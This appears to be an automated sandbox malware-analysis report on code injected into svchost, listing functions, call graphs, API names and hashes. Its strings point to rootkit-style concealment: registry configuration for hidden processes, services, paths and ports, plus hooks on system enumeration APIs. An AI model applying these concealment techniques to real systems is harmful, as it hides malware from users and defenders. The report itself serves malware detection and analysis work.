                                                          execution_graph 14744 2062e96273c 14746 2062e96276a 14744->14746 14745 2062e962858 LoadLibraryA 14745->14746 14746->14745 14747 2062e9628d4 14746->14747 14748 2062e991abc 14753 2062e991628 GetProcessHeap HeapAlloc 14748->14753 14750 2062e991ad2 Sleep SleepEx 14751 2062e991acb 14750->14751 14751->14750 14752 2062e991598 StrCmpIW StrCmpW 14751->14752 14752->14751 14797 2062e991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14753->14797 14755 2062e991650 14798 2062e991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14755->14798 14757 2062e991661 14799 2062e991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14757->14799 14759 2062e99166a 14800 2062e991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14759->14800 14761 2062e991673 14762 2062e99168e RegOpenKeyExW 14761->14762 14763 2062e9916c0 RegOpenKeyExW 14762->14763 14764 2062e9918a6 14762->14764 14765 2062e9916ff RegOpenKeyExW 14763->14765 14766 2062e9916e9 14763->14766 14764->14751 14768 2062e991723 14765->14768 14769 2062e99173a RegOpenKeyExW 14765->14769 14801 2062e9912bc RegQueryInfoKeyW 14766->14801 14810 2062e99104c RegQueryInfoKeyW 14768->14810 14772 2062e99175e 14769->14772 14773 2062e991775 RegOpenKeyExW 14769->14773 14775 2062e9912bc 16 API calls 14772->14775 14776 2062e9917b0 RegOpenKeyExW 14773->14776 14777 2062e991799 14773->14777 14781 2062e99176b RegCloseKey 14775->14781 14779 2062e9917d4 14776->14779 14780 2062e9917eb RegOpenKeyExW 14776->14780 14778 2062e9912bc 16 API calls 14777->14778 14782 2062e9917a6 RegCloseKey 14778->14782 14783 2062e9912bc 16 API calls 14779->14783 14784 2062e99180f 14780->14784 14785 2062e991826 RegOpenKeyExW 14780->14785 14781->14773 14782->14776 14786 2062e9917e1 RegCloseKey 14783->14786 14787 2062e99104c 6 API calls 14784->14787 14788 2062e991861 RegOpenKeyExW 14785->14788 14789 2062e99184a 14785->14789 14786->14780 14790 2062e99181c RegCloseKey 14787->14790 14792 2062e991885 14788->14792 14793 2062e99189c RegCloseKey 14788->14793 14791 2062e99104c 6 API calls 14789->14791 14790->14785 14795 2062e991857 RegCloseKey 14791->14795 14794 2062e99104c 6 API calls 14792->14794 14793->14764 14796 2062e991892 RegCloseKey 14794->14796 14795->14788 14796->14793 14797->14755 14798->14757 14799->14759 14800->14761 14802 2062e991327 GetProcessHeap HeapAlloc 14801->14802 14803 2062e99148a RegCloseKey 14801->14803 14804 2062e991352 RegEnumValueW 14802->14804 14805 2062e991476 GetProcessHeap HeapFree 14802->14805 14803->14765 14806 2062e9913a5 14804->14806 14805->14803 14806->14804 14806->14805 14808 2062e99141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14806->14808 14809 2062e9913d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14806->14809 14815 2062e99152c 14806->14815 14808->14806 14809->14808 14811 2062e9911b5 RegCloseKey 14810->14811 14813 2062e9910bf 14810->14813 14811->14769 14812 2062e9910cf RegEnumValueW 14812->14813 14813->14811 14813->14812 14814 2062e99114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14813->14814 14814->14813 14816 2062e99157c 14815->14816 14819 2062e991546 14815->14819 14816->14806 14817 2062e991565 StrCmpW 14817->14819 14818 2062e99155d StrCmpIW 14818->14819 14819->14816 14819->14817 14819->14818

                                                          Executed Functions

                                                          Function 000002062E991628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 106492572-2879589442
                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction ID: 9c5e9add5d64f584db0b54891cea219c13e3b48853e4aab685c73ecfecbe125b
                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction Fuzzy Hash: A771EB66B10B118EEB109FA6E85C69D33A4FB84B88F415122DE4E57B6ADF38C4E4C750
                                                          Function 000002062E99328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction ID: e4c22a57f328875a07b3f742541068a8ec2ee5a7cd90de39d0273e5063131e04
                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction Fuzzy Hash: 49115B70E607418EFB60DFE2B84E3592294AB94B45F90813B9D5A82697EF78C0E48610
                                                          Function 000002062E991ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000002062E991628: GetProcessHeap.KERNEL32 ref: 000002062E991633
                                                            • Part of subcall function 000002062E991628: HeapAlloc.KERNEL32 ref: 000002062E991642
                                                            • Part of subcall function 000002062E991628: RegOpenKeyExW.ADVAPI32 ref: 000002062E9916B2
                                                            • Part of subcall function 000002062E991628: RegOpenKeyExW.ADVAPI32 ref: 000002062E9916DF
                                                            • Part of subcall function 000002062E991628: RegCloseKey.ADVAPI32 ref: 000002062E9916F9
                                                            • Part of subcall function 000002062E991628: RegOpenKeyExW.ADVAPI32 ref: 000002062E991719
                                                            • Part of subcall function 000002062E991628: RegCloseKey.ADVAPI32 ref: 000002062E991734
                                                            • Part of subcall function 000002062E991628: RegOpenKeyExW.ADVAPI32 ref: 000002062E991754
                                                            • Part of subcall function 000002062E991628: RegCloseKey.ADVAPI32 ref: 000002062E99176F
                                                            • Part of subcall function 000002062E991628: RegOpenKeyExW.ADVAPI32 ref: 000002062E99178F
                                                            • Part of subcall function 000002062E991628: RegCloseKey.ADVAPI32 ref: 000002062E9917AA
                                                            • Part of subcall function 000002062E991628: RegOpenKeyExW.ADVAPI32 ref: 000002062E9917CA
                                                          • Sleep.KERNEL32 ref: 000002062E991AD7
                                                          • SleepEx.KERNELBASE ref: 000002062E991ADD
                                                            • Part of subcall function 000002062E991628: RegCloseKey.ADVAPI32 ref: 000002062E9917E5
                                                            • Part of subcall function 000002062E991628: RegOpenKeyExW.ADVAPI32 ref: 000002062E991805
                                                            • Part of subcall function 000002062E991628: RegCloseKey.ADVAPI32 ref: 000002062E991820
                                                            • Part of subcall function 000002062E991628: RegOpenKeyExW.ADVAPI32 ref: 000002062E991840
                                                            • Part of subcall function 000002062E991628: RegCloseKey.ADVAPI32 ref: 000002062E99185B
                                                            • Part of subcall function 000002062E991628: RegOpenKeyExW.ADVAPI32 ref: 000002062E99187B
                                                            • Part of subcall function 000002062E991628: RegCloseKey.ADVAPI32 ref: 000002062E991896
                                                            • Part of subcall function 000002062E991628: RegCloseKey.ADVAPI32 ref: 000002062E9918A0
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1534210851-0
                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction ID: 69c41b59e5fd594a8f80d64a427d188483b45942cbb8be6bd18bc23725f8edcd
                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction Fuzzy Hash: 94311061E007414DFF509BA7D64D3BD23A5BB44BC5F0694339E098729BEE14C8F1CA20
                                                          Function 000002062E96273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 108 2062e96273c-2062e9627a4 call 2062e9629d4 * 4 117 2062e9627aa-2062e9627ad 108->117 118 2062e9629b2 108->118 117->118 120 2062e9627b3-2062e9627b6 117->120 119 2062e9629b4-2062e9629d0 118->119 120->118 121 2062e9627bc-2062e9627bf 120->121 121->118 122 2062e9627c5-2062e9627e6 121->122 122->118 124 2062e9627ec-2062e96280c 122->124 125 2062e962838-2062e96283f 124->125 126 2062e96280e-2062e962836 124->126 127 2062e962845-2062e962852 125->127 128 2062e9628df-2062e9628e6 125->128 126->125 126->126 127->128 131 2062e962858-2062e96286a LoadLibraryA 127->131 129 2062e9628ec-2062e962901 128->129 130 2062e962992-2062e9629b0 128->130 129->130 132 2062e962907 129->132 130->119 133 2062e96286c-2062e962878 131->133 134 2062e9628ca-2062e9628d2 131->134 135 2062e96290d-2062e962921 132->135 136 2062e9628c5-2062e9628c8 133->136 134->131 137 2062e9628d4-2062e9628d9 134->137 139 2062e962982-2062e96298c 135->139 140 2062e962923-2062e962934 135->140 136->134 141 2062e96287a-2062e96287d 136->141 137->128 139->130 139->135 143 2062e962936-2062e96293d 140->143 144 2062e96293f-2062e962943 140->144 145 2062e9628a7-2062e9628b7 141->145 146 2062e96287f-2062e9628a5 141->146 147 2062e962970-2062e962980 143->147 148 2062e96294d-2062e962951 144->148 149 2062e962945-2062e96294b 144->149 150 2062e9628ba-2062e9628c1 145->150 146->150 147->139 147->140 151 2062e962963-2062e962967 148->151 152 2062e962953-2062e962961 148->152 149->147 150->136 151->147 154 2062e962969-2062e96296c 151->154 152->147 154->147
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2612748111.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e960000_svchost.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction ID: edec23249157009703dc7ed41c04a67906869d9e7728466f5ba2b0ed28332cb6
                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction Fuzzy Hash: 70610232F017928BDB54CF95950876DB3A2F794BA4F188533CE5D0778ADA38D8A2C780

                                                          Non-executed Functions

                                                          Function 000002062E992B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 353 2062e992b2c-2062e992ba5 call 2062e9b2ce0 356 2062e992ee0-2062e992f03 353->356 357 2062e992bab-2062e992bb1 353->357 357->356 358 2062e992bb7-2062e992bba 357->358 358->356 359 2062e992bc0-2062e992bc3 358->359 359->356 360 2062e992bc9-2062e992bd9 GetModuleHandleA 359->360 361 2062e992bdb-2062e992beb GetProcAddress 360->361 362 2062e992bed 360->362 363 2062e992bf0-2062e992c0e 361->363 362->363 363->356 365 2062e992c14-2062e992c33 StrCmpNIW 363->365 365->356 366 2062e992c39-2062e992c3d 365->366 366->356 367 2062e992c43-2062e992c4d 366->367 367->356 368 2062e992c53-2062e992c5a 367->368 368->356 369 2062e992c60-2062e992c73 368->369 370 2062e992c83 369->370 371 2062e992c75-2062e992c81 369->371 372 2062e992c86-2062e992c8a 370->372 371->372 373 2062e992c9a 372->373 374 2062e992c8c-2062e992c98 372->374 375 2062e992c9d-2062e992ca7 373->375 374->375 376 2062e992d9d-2062e992da1 375->376 377 2062e992cad-2062e992cb0 375->377 378 2062e992ed2-2062e992eda 376->378 379 2062e992da7-2062e992daa 376->379 380 2062e992cc2-2062e992ccc 377->380 381 2062e992cb2-2062e992cbf call 2062e99199c 377->381 378->356 378->369 382 2062e992dbb-2062e992dc5 379->382 383 2062e992dac-2062e992db8 call 2062e99199c 379->383 385 2062e992cce-2062e992cdb 380->385 386 2062e992d00-2062e992d0a 380->386 381->380 390 2062e992df5-2062e992df8 382->390 391 2062e992dc7-2062e992dd4 382->391 383->382 385->386 393 2062e992cdd-2062e992cea 385->393 387 2062e992d3a-2062e992d3d 386->387 388 2062e992d0c-2062e992d19 386->388 396 2062e992d3f-2062e992d49 call 2062e991bbc 387->396 397 2062e992d4b-2062e992d58 lstrlenW 387->397 388->387 395 2062e992d1b-2062e992d28 388->395 400 2062e992e05-2062e992e12 lstrlenW 390->400 401 2062e992dfa-2062e992e03 call 2062e991bbc 390->401 391->390 399 2062e992dd6-2062e992de3 391->399 394 2062e992ced-2062e992cf3 393->394 403 2062e992d93-2062e992d98 394->403 404 2062e992cf9-2062e992cfe 394->404 407 2062e992d2b-2062e992d31 395->407 396->397 396->403 409 2062e992d7b-2062e992d8d call 2062e993844 397->409 410 2062e992d5a-2062e992d64 397->410 411 2062e992de6-2062e992dec 399->411 405 2062e992e35-2062e992e3f call 2062e993844 400->405 406 2062e992e14-2062e992e1e 400->406 401->400 421 2062e992e4a-2062e992e55 401->421 414 2062e992e42-2062e992e44 403->414 404->386 404->394 405->414 406->405 415 2062e992e20-2062e992e33 call 2062e99152c 406->415 407->403 416 2062e992d33-2062e992d38 407->416 409->403 409->414 410->409 419 2062e992d66-2062e992d79 call 2062e99152c 410->419 420 2062e992dee-2062e992df3 411->420 411->421 414->378 414->421 415->405 415->421 416->387 416->407 419->403 419->409 420->390 420->411 425 2062e992e57-2062e992e5b 421->425 426 2062e992ecc-2062e992ed0 421->426 429 2062e992e63-2062e992e7d call 2062e9985c0 425->429 430 2062e992e5d-2062e992e61 425->430 426->378 432 2062e992e80-2062e992e83 429->432 430->429 430->432 435 2062e992e85-2062e992ea3 call 2062e9985c0 432->435 436 2062e992ea6-2062e992ea9 432->436 435->436 436->426 438 2062e992eab-2062e992ec9 call 2062e9985c0 436->438 438->426
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction ID: edd4a287f7fcdab0035e61dbab594e2559749f47e2410cac84f72bd878b511a7
                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction Fuzzy Hash: 42B17B62A11B508EEB648FA5E48C7A963A5FB44B84F449037EE0D57796EB35CCE0C740
                                                          Function 000002062E997D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction ID: 5514afec05611032726702a1916322508145ebbf6466a734a0453922e9b55509
                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction Fuzzy Hash: 76314F72A05B808EEB609FA0E8487ED7365F784744F44443ADE4D57B9AEF39C698C710
                                                          Function 000002062E99D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction ID: eedfc931d0a2585089c1a19f1d08bde51b2b0f7e2c9f9f719220dd1878b8478c
                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction Fuzzy Hash: 6A317336A14F808EEB60DF65E88839E73A4F789754F504126EE9D43B5ADF38C5A5CB00
                                                          Function 000002062E9912BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction ID: d7ff4c110c7fa7448182160584dfbac88eb7172cb53b3b10f40ca0c7beb29536
                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction Fuzzy Hash: F0515C36A00B848AEB54CFA2E54C35A7BA1F789BC9F048136DE490771ADF3CC0A5CB01
                                                          Function 000002062E991D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                          • API String ID: 4175298099-1975688563
                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction ID: b4de291d8b2775a6679ccad32d41eac8a49eb8b67b30e6194559d557a4d89ce2
                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction Fuzzy Hash: 4B319568D41B4AADEB05EBEAE85D6D46320FB05348FC19433AC0D066779F3882EDC761
                                                          Function 000002062E966910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 197 2062e966910-2062e966916 198 2062e966918-2062e96691b 197->198 199 2062e966951-2062e96695b 197->199 201 2062e96691d-2062e966920 198->201 202 2062e966945-2062e966984 call 2062e966fc0 198->202 200 2062e966a78-2062e966a8d 199->200 203 2062e966a9c-2062e966ab6 call 2062e966e54 200->203 204 2062e966a8f 200->204 206 2062e966938 __scrt_dllmain_crt_thread_attach 201->206 207 2062e966922-2062e966925 201->207 220 2062e96698a-2062e96699f call 2062e966e54 202->220 221 2062e966a52 202->221 218 2062e966ab8-2062e966aed call 2062e966f7c call 2062e966e1c call 2062e967318 call 2062e967130 call 2062e967154 call 2062e966fac 203->218 219 2062e966aef-2062e966b20 call 2062e967190 203->219 210 2062e966a91-2062e966a9b 204->210 212 2062e96693d-2062e966944 206->212 208 2062e966927-2062e966930 207->208 209 2062e966931-2062e966936 call 2062e966f04 207->209 209->212 218->210 229 2062e966b22-2062e966b28 219->229 230 2062e966b31-2062e966b37 219->230 232 2062e966a6a-2062e966a77 call 2062e967190 220->232 233 2062e9669a5-2062e9669b6 call 2062e966ec4 220->233 224 2062e966a54-2062e966a69 221->224 229->230 234 2062e966b2a-2062e966b2c 229->234 235 2062e966b39-2062e966b43 230->235 236 2062e966b7e-2062e966b94 call 2062e96268c 230->236 232->200 247 2062e9669b8-2062e9669dc call 2062e9672dc call 2062e966e0c call 2062e966e38 call 2062e96ac0c 233->247 248 2062e966a07-2062e966a11 call 2062e967130 233->248 242 2062e966c1f-2062e966c2c 234->242 243 2062e966b45-2062e966b4d 235->243 244 2062e966b4f-2062e966b5d call 2062e975780 235->244 254 2062e966bcc-2062e966bce 236->254 255 2062e966b96-2062e966b98 236->255 250 2062e966b63-2062e966b78 call 2062e966910 243->250 244->250 265 2062e966c15-2062e966c1d 244->265 247->248 300 2062e9669de-2062e9669e5 __scrt_dllmain_after_initialize_c 247->300 248->221 268 2062e966a13-2062e966a1f call 2062e967180 248->268 250->236 250->265 263 2062e966bd5-2062e966bea call 2062e966910 254->263 264 2062e966bd0-2062e966bd3 254->264 255->254 262 2062e966b9a-2062e966bbc call 2062e96268c call 2062e966a78 255->262 262->254 294 2062e966bbe-2062e966bc6 call 2062e975780 262->294 263->265 279 2062e966bec-2062e966bf6 263->279 264->263 264->265 265->242 287 2062e966a45-2062e966a50 268->287 288 2062e966a21-2062e966a2b call 2062e967098 268->288 284 2062e966bf8-2062e966bff 279->284 285 2062e966c01-2062e966c11 call 2062e975780 279->285 284->265 285->265 287->224 288->287 299 2062e966a2d-2062e966a3b 288->299 294->254 299->287 300->248 301 2062e9669e7-2062e966a04 call 2062e96abc8 300->301 301->248
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2612748111.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e960000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                          • API String ID: 190073905-1786718095
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: 522253dfcb96ab018a448d25b207b9e9c1b7455c5fefcf395498ae1a1ffb0b7f
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: 6881BC71F007438EFB90AFE5944D39962A0EB85B80F548137AE09877A7DB39C8F58780
                                                          Function 000002062E99CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 304 2062e99ce28-2062e99ce4a call 2062e9a6080 307 2062e99ce69-2062e99ce74 FlsSetValue 304->307 308 2062e99ce4c-2062e99ce57 FlsGetValue 304->308 311 2062e99ce76-2062e99ce79 307->311 312 2062e99ce7b-2062e99ce80 307->312 309 2062e99ce63 308->309 310 2062e99ce59-2062e99ce61 308->310 309->307 313 2062e99ced5-2062e99cee0 SetLastError 310->313 311->313 314 2062e99ce85 call 2062e99d6cc 312->314 315 2062e99cef5-2062e99cf0b call 2062e99c748 313->315 316 2062e99cee2-2062e99cef4 313->316 317 2062e99ce8a-2062e99ce96 314->317 330 2062e99cf28-2062e99cf33 FlsSetValue 315->330 331 2062e99cf0d-2062e99cf18 FlsGetValue 315->331 319 2062e99cea8-2062e99ceb2 FlsSetValue 317->319 320 2062e99ce98-2062e99ce9f FlsSetValue 317->320 322 2062e99ceb4-2062e99cec4 FlsSetValue 319->322 323 2062e99cec6-2062e99ced0 call 2062e99cb94 call 2062e99d744 319->323 321 2062e99cea1-2062e99cea6 call 2062e99d744 320->321 321->311 322->321 323->313 334 2062e99cf35-2062e99cf3a 330->334 335 2062e99cf98-2062e99cf9f call 2062e99c748 330->335 332 2062e99cf22 331->332 333 2062e99cf1a-2062e99cf1e 331->333 332->330 333->335 337 2062e99cf20 333->337 339 2062e99cf3f call 2062e99d6cc 334->339 340 2062e99cf8f-2062e99cf97 337->340 342 2062e99cf44-2062e99cf50 339->342 343 2062e99cf62-2062e99cf6c FlsSetValue 342->343 344 2062e99cf52-2062e99cf59 FlsSetValue 342->344 346 2062e99cf80-2062e99cf8a call 2062e99cb94 call 2062e99d744 343->346 347 2062e99cf6e-2062e99cf7e FlsSetValue 343->347 345 2062e99cf5b-2062e99cf60 call 2062e99d744 344->345 345->335 346->340 347->345
                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 000002062E99CE37
                                                          • FlsGetValue.KERNEL32(?,?,?,000002062E9A0A6B,?,?,?,000002062E9A045C,?,?,?,000002062E99C84F), ref: 000002062E99CE4C
                                                          • FlsSetValue.KERNEL32(?,?,?,000002062E9A0A6B,?,?,?,000002062E9A045C,?,?,?,000002062E99C84F), ref: 000002062E99CE6D
                                                          • FlsSetValue.KERNEL32(?,?,?,000002062E9A0A6B,?,?,?,000002062E9A045C,?,?,?,000002062E99C84F), ref: 000002062E99CE9A
                                                          • FlsSetValue.KERNEL32(?,?,?,000002062E9A0A6B,?,?,?,000002062E9A045C,?,?,?,000002062E99C84F), ref: 000002062E99CEAB
                                                          • FlsSetValue.KERNEL32(?,?,?,000002062E9A0A6B,?,?,?,000002062E9A045C,?,?,?,000002062E99C84F), ref: 000002062E99CEBC
                                                          • SetLastError.KERNEL32 ref: 000002062E99CED7
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002062E9A0A6B,?,?,?,000002062E9A045C,?,?,?,000002062E99C84F), ref: 000002062E99CF0D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,000002062E99ECCC,?,?,?,?,000002062E99BF9F,?,?,?,?,?,000002062E997AB0), ref: 000002062E99CF2C
                                                            • Part of subcall function 000002062E99D6CC: HeapAlloc.KERNEL32 ref: 000002062E99D721
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002062E9A0A6B,?,?,?,000002062E9A045C,?,?,?,000002062E99C84F), ref: 000002062E99CF54
                                                            • Part of subcall function 000002062E99D744: HeapFree.KERNEL32 ref: 000002062E99D75A
                                                            • Part of subcall function 000002062E99D744: GetLastError.KERNEL32 ref: 000002062E99D764
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002062E9A0A6B,?,?,?,000002062E9A045C,?,?,?,000002062E99C84F), ref: 000002062E99CF65
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002062E9A0A6B,?,?,?,000002062E9A045C,?,?,?,000002062E99C84F), ref: 000002062E99CF76
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction ID: b0b39aad4ae3d7827d380e00159dc5c0f144c42a6c112fd7998f001c9ffd51d7
                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction Fuzzy Hash: 25418161F013448EFA68A7F6595D3B962825B457B0F28873BAD36067E7DE2898F1C600
